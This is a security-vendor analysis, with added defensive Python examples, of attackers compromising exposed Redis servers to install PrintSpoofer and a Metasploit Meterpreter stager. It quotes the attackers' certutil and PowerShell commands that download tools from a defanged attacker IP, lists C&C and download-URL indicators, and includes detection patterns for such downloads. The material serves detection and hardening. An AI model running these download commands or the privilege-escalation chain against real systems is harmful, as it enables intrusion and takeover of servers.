Metasploit Meterpreter Installed via Redis Server

AhnLab SEcurity intelligence Center (ASEC) recently discovered that the Metasploit Meterpreter backdoor has been installed via the Redis service. Redis (Remote Dictionary Server) is an open-source in-memory data structure store that is also used as a database. It is presumed that the threat actors abused inappropriate settings or ran commands through vulnerability attacks.

Redis is used for various purposes, the main ones being session management, message brokering, and queues. As many systems all over the world use Redis, it is becoming a major target for threat actors. Malware installed through attacks against vulnerable Redis services includes Kinsing [1], P2PInfect [2], Skidmap [3], Migo [4], and HeadCrab [5].

Such malware strains attack Redis servers that are exposed to the Internet with the authentication feature disabled. After gaining access to Redis, threat actors can install malware through known techniques. The two main ones are registering the command that executes the malware as a Cron task, and using the SLAVEOF command to make the victim server a replica (slave) of a threat actor-controlled Redis server that serves the malware.
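Both techniques above depend on the same preconditions: the Redis port is reachable from outside, no password is required, and administrative commands (CONFIG for the Cron-file trick, SLAVEOF/REPLICAOF for the replica trick) are still available to any client. The following added example (not ASEC's tooling, and not part of the original post) audits a redis.conf for exactly those preconditions. It targets the Redis 3.x-era controls this article is about, where `rename-command` is the only way to disable a command (Redis 6+ ACLs are the better option where available); the two sample configs and the 16-character password threshold are constructed for illustration.

```python
"""Audit a redis.conf for the exposure the known Redis attack paths rely on.

Added example, not ASEC's code.  Checks, from the config text alone:
  * network exposure   (bind / protected-mode)
  * authentication     (requirepass)
  * dangerous commands (CONFIG, SLAVEOF, REPLICAOF, DEBUG, MODULE) still reachable
"""
import shlex

# Commands the known Redis attack paths need: CONFIG SET dir/dbfilename lets a
# client write an arbitrary file (e.g. a crontab), SLAVEOF/REPLICAOF pulls data
# or a module from an attacker-controlled master.  rename-command X "" disables X.
DANGEROUS_COMMANDS = ("CONFIG", "SLAVEOF", "REPLICAOF", "DEBUG", "MODULE")
LOOPBACK = {"127.0.0.1", "::1", "-::1", "localhost"}


def parse_redis_conf(text):
    """Return {directive: [[values...], ...]} in order of appearance."""
    conf = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = shlex.split(line)          # handles rename-command CONFIG ""
        conf.setdefault(parts[0].lower(), []).append(parts[1:])
    return conf


def audit_redis_conf(text):
    """Return a list of human-readable findings; an empty list means no issue found."""
    conf = parse_redis_conf(text)
    findings = []

    # 1. exposure: no bind directive means all interfaces; non-loopback binds are public
    binds = [addr for values in conf.get("bind", []) for addr in values]
    if not binds:
        findings.append("bind: no bind directive, Redis listens on all interfaces")
    elif any(b not in LOOPBACK for b in binds):
        findings.append("bind: listens on non-loopback address(es): " + ", ".join(binds))

    # 2. protected-mode no removes the safety net for unauthenticated exposure
    pm = conf.get("protected-mode", [["yes"]])[-1]
    if pm and pm[0].lower() == "no":
        findings.append("protected-mode: disabled")

    # 3. authentication (constructed threshold: at least 16 characters)
    pw = conf.get("requirepass", [])
    if not pw or not pw[-1] or not pw[-1][0]:
        findings.append("requirepass: not set, any client that can connect is trusted")
    elif len(pw[-1][0]) < 16:
        findings.append("requirepass: password shorter than 16 characters")

    # 4. dangerous commands not disabled via rename-command X ""
    renamed = {v[0].upper(): v[1] for v in conf.get("rename-command", []) if len(v) == 2}
    for cmd in DANGEROUS_COMMANDS:
        if renamed.get(cmd, cmd) != "":
            findings.append(f"rename-command: {cmd} not disabled")
    return findings


# Constructed sample: exposed, unauthenticated config of the kind these attacks need.
WEAK_CONF = """
port 6379
bind 0.0.0.0
protected-mode no
daemonize yes
"""

# Constructed sample: loopback only, authenticated, risky commands disabled.
HARDENED_CONF = """
port 6379
bind 127.0.0.1
protected-mode yes
requirepass S0me-long-constructed-passphrase!
rename-command CONFIG ""
rename-command SLAVEOF ""
rename-command REPLICAOF ""
rename-command DEBUG ""
rename-command MODULE ""
"""

if __name__ == "__main__":
    for name, cfg in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(f"[{name}]")
        for f in audit_redis_conf(cfg) or ["no findings"]:
            print("  -", f)
```

Run it against a real redis.conf by reading the file into a string and passing it to `audit_redis_conf`. The config-only view is deliberately conservative: a host firewall can hide an exposed bind, and a reverse proxy cannot add authentication, so a clean result here is necessary but not sufficient.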

1. Attack Case

Unlike other known cases, the targeted system ran Windows, and the Redis version used in this attack was 3.x, a version developed in 2016. As it is an old version, it was likely vulnerable to attacks that abuse misconfiguration or exploit known vulnerabilities.

The threat actor first installed PrintSpoofer, a privilege escalation tool. PowerShell’s Invoke-WebRequest cmdlet was used for the installation, and the tool was downloaded into the Redis installation directory.

Figure 1. Logs showing the threat actor attacking the Redis service to install PrintSpoofer

PrintSpoofer is a tool that abuses SeImpersonatePrivilege to escalate privileges. It is often used in attacks against vulnerable services that are not managed properly or have not been patched to a recent version, such as web servers or database servers like MS-SQL. As PrintSpoofer is available as open source on GitHub, the threat actor built it themselves and also changed a certain string (“nilaina mana”), possibly to evade detection.

Figure 2. PrintSpoofer built from the open-source project
  • PDB path: C:\Users\designernembak\Desktop\TOOLS\PrintSpoofer-master\x64\Debug\PrintSpoofer.pdb
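A PDB path like the one above is a useful hunting and clustering pivot: it records the builder's user name, source tree and build flavour, and it survives string changes such as the “nilaina mana” edit. The added example below (not ASEC's code) extracts CodeView RSDS records by raw byte scan, which works on memory dumps and truncated samples as well as intact PE files, and then pulls the pivots out of the path. The sample bytes are constructed (a fake carrier, one junk RSDS marker that must be rejected, and one real-looking record); the GUID is made up, and the path is the page's PDB path with the backslashes restored, which is an assumption about the original separators.

```python
"""Extract CodeView (RSDS) PDB records from a binary blob and derive hunting pivots.

Added example, not ASEC's code.  Raw scanning instead of walking the PE debug
directory so it also works on dumps and partial samples.
"""
import re
import struct
import uuid

MAX_PATH = 260  # constructed sanity limit for a Windows build path


def extract_pdb_paths(data):
    """Return [(guid, age, path), ...] for every plausible RSDS record in data.

    RSDS layout: 'RSDS' | 16-byte GUID (little-endian) | uint32 age | NUL-terminated path.
    A record is accepted only if the path is printable ASCII and ends in .pdb.
    """
    results = []
    for m in re.finditer(b"RSDS", data):
        off = m.start()
        if off + 24 > len(data):
            continue
        guid = uuid.UUID(bytes_le=data[off + 4:off + 20])
        (age,) = struct.unpack_from("<I", data, off + 20)
        end = data.find(b"\x00", off + 24)
        if end == -1:
            continue
        raw_path = data[off + 24:end]
        if not raw_path or len(raw_path) > MAX_PATH or not raw_path.lower().endswith(b".pdb"):
            continue
        try:
            path = raw_path.decode("ascii")
        except UnicodeDecodeError:
            continue
        if not all(32 <= ord(c) < 127 for c in path):
            continue
        results.append((str(guid), age, path))
    return results


def pdb_indicators(path):
    """Pull attribution pivots out of a PDB path: user under \\Users\\, build flavour, arch."""
    parts = path.split("\\")
    lowered = [p.lower() for p in parts]
    info = {"path": path, "pdb_name": parts[-1]}
    if "users" in lowered:
        i = lowered.index("users")
        if i + 1 < len(parts):
            info["user"] = parts[i + 1]
    for flavour in ("Debug", "Release"):
        if flavour in parts:
            info["build"] = flavour
    for arch in ("x64", "x86", "Win32", "ARM64"):
        if arch in parts:
            info["arch"] = arch
    return info


# Constructed sample input.  The GUID is made up; the path is the page's PDB path
# with backslashes restored (an assumption).
_GUID = uuid.UUID("12345678-1234-5678-1234-567812345678")
_PATH = rb"C:\Users\designernembak\Desktop\TOOLS\PrintSpoofer-master\x64\Debug\PrintSpoofer.pdb"
SAMPLE = (
    b"MZ" + b"\x90" * 60                          # not a real PE, just a carrier
    + b"RSDS" + b"\xff" * 20 + b"\x01\x02\x00"    # RSDS-looking junk that must be rejected
    + b"\x00" * 16
    + b"RSDS" + _GUID.bytes_le + struct.pack("<I", 1) + _PATH + b"\x00"
    + b"\x00" * 32
)

if __name__ == "__main__":
    for guid, age, path in extract_pdb_paths(SAMPLE):
        print(f"GUID {guid} age {age}")
        print(pdb_indicators(path))
```

For a real sample, pass `open(sample, "rb").read()` instead of `SAMPLE`; the GUID and age together identify one specific build, so identical values across otherwise different files mean the same compilation, while a shared user name or source tree with different GUIDs points at the same builder recompiling.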

Such attacks against the Redis service have been found continuously since the second half of last year. The difference between the past cases and the current ones is that PrintSpoofer is now installed using the CertUtil tool instead of PowerShell.

  • Recently confirmed command: certutil -urlcache -split -f “hxxp://35.185.187[.]24/PrintSpoofer.exe” psf.exe
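Both download methods seen in these cases (Invoke-WebRequest earlier, `certutil -urlcache` more recently) are ordinary Windows tools, so the signal is the context rather than the binary: a database service process spawning a shell or LOLBin that fetches a file from the Internet. The added example below (not ASEC's code) runs that logic over a few constructed process-creation events of the kind Sysmon Event ID 1 or EDR telemetry provides. The `redis-server.exe` parent process and the file paths are assumptions for illustration; the certutil command line is the one quoted above.

```python
"""Flag Redis-spawned download activity in process-creation telemetry.

Added example, not ASEC's code.  Two independent signals are scored:
  * parent process is redis-server.exe and the child is a shell or LOLBin
  * the command line contains a known download primitive
Either alone is medium; both together is high.
"""
import re

SHELLS_AND_LOLBINS = {"powershell.exe", "pwsh.exe", "cmd.exe", "certutil.exe", "bitsadmin.exe"}

DOWNLOAD_PATTERNS = [
    ("powershell_web_download", re.compile(r"invoke-webrequest|\biwr\b|downloadstring|downloadfile", re.I)),
    ("certutil_urlcache", re.compile(r"certutil(\.exe)?.*-urlcache", re.I)),
]


def basename(path):
    """Lower-case file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def detect(events):
    """Return one hit per suspicious event with its severity and the reasons."""
    hits = []
    for ev in events:
        parent, child, cmd = basename(ev["ParentImage"]), basename(ev["Image"]), ev["CommandLine"]
        reasons = []
        if parent == "redis-server.exe" and child in SHELLS_AND_LOLBINS:
            reasons.append("redis-server spawned " + child)
        for name, rx in DOWNLOAD_PATTERNS:
            if rx.search(cmd):
                reasons.append(name)
        if reasons:
            hits.append({
                "severity": "high" if len(reasons) > 1 else "medium",
                "reasons": reasons,
                "command": cmd,
            })
    return hits


# Constructed events (assumed paths; redis-server.exe as parent is an assumption).
EVENTS = [
    {   # benign: the service starting normally
        "ParentImage": r"C:\Windows\System32\services.exe",
        "Image": r"C:\Program Files\Redis\redis-server.exe",
        "CommandLine": r'"C:\Program Files\Redis\redis-server.exe" --service-run redis.windows-service.conf',
    },
    {   # earlier pattern: PowerShell download into the Redis directory
        "ParentImage": r"C:\Program Files\Redis\redis-server.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": r'powershell -c "invoke-webrequest -Uri hxxp://35.185.187[.]24/ps.exe -OutFile C:\Program Files\Redis\ps.exe"',
    },
    {   # recent pattern: the CertUtil command quoted on the page
        "ParentImage": r"C:\Program Files\Redis\redis-server.exe",
        "Image": r"C:\Windows\System32\certutil.exe",
        "CommandLine": r'certutil -urlcache -split -f "hxxp://35.185.187[.]24/PrintSpoofer.exe" psf.exe',
    },
    {   # benign: an administrator hashing a file from a console
        "ParentImage": r"C:\Windows\System32\cmd.exe",
        "Image": r"C:\Windows\System32\certutil.exe",
        "CommandLine": r"certutil -hashfile C:\temp\update.msi SHA256",
    },
]

if __name__ == "__main__":
    for hit in detect(EVENTS):
        print(hit["severity"].upper(), "|", "; ".join(hit["reasons"]), "|", hit["command"])
```

On a real estate the parent-process rule should be widened to whatever service accounts host Redis (or MS-SQL, as the text notes), and the medium-severity download-only hits are where administrator usage of certutil will need tuning.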

2. Metasploit Meterpreter

After installing PrintSpoofer, the threat actor installed Metasploit’s Stager malware.

Figure 3. Logs showing Metasploit Stager being installed

Metasploit is a penetration testing framework that can be used to inspect security vulnerabilities in the networks and systems of companies and organizations, providing various features for each penetration test stage. Like Cobalt Strike, it offers the features needed at each stage, from creating various types of payloads for initial infection and stealing account credentials to taking over systems via lateral movement.

Similar to Cobalt Strike’s Beacon, Meterpreter is the backdoor that carries out the actual malicious behaviors. Meterpreter can be divided into two types depending on how it is installed: staged or stageless. In the stageless method, Meterpreter is included in the payload itself, which makes the malware somewhat larger. In the staged method, a small malware named “Stager” is used: when Stager is executed, it downloads Meterpreter from the C&C server, so Stager can be very small compared to Meterpreter.

The threat actor created Stager using the reverse TCP method and installed it on the infected system. When Stager is executed, it connects to the C&C server and downloads the Meterpreter backdoor. When this process is complete, Meterpreter is executed in memory, allowing the threat actor to take control of the infected system.

Figure 4. Meterpreter backdoor downloaded from the C&C server

3. Conclusion

Recently, Metasploit Meterpreter has been installed on externally exposed Redis servers. The Redis service targeted in these attacks was a version developed in 2016, which means it can be a target of vulnerability attacks and was likely not properly managed.

When Metasploit is installed, the threat actor can take control of the infected system and also dominate the internal network of an organization using the various features offered by the malware. Thus, security managers must keep the server patched and up to date, and take measures to prevent known vulnerabilities from being exploited. For externally exposed servers, security products such as firewalls must be used to restrict external access. Also, V3 should be updated to the latest version so that malware infection can be prevented.

File Detection
– Trojan/Win32.Shell.R1283 (2010-12-17.00)
– Exploit/Win.PrintSpoofer.C5538254 (2023.11.06.03)
– Exploit/Win.PrintSpoofer.R358767 (2023.08.14.00)

Behavior Detection
– Malware/MDP.Download.M1197

IoC
MD5s

– cff64cc3e82aebd7a7e81f1633b5040e: Metasploit Stager (meteran.exe)
– dbdcbacbc74b139d914747690ebe0e1c: PrintSpoofer (PrintSpoofer.exe)
– b26b57b28e61f9320cc42d97428f3806: PrintSpoofer (ps.exe)

C&C Server
– 34.124.148[.]215:9070

Download URLs
– hxxp://35.185.187[.]24/PrintSpoofer.exe
– hxxp://35.185.187[.]24/ps.exe
– hxxp://35.185.187[.]24/meteran.exe


The post Metasploit Meterpreter Installed via Redis Server appeared first on ASEC BLOG.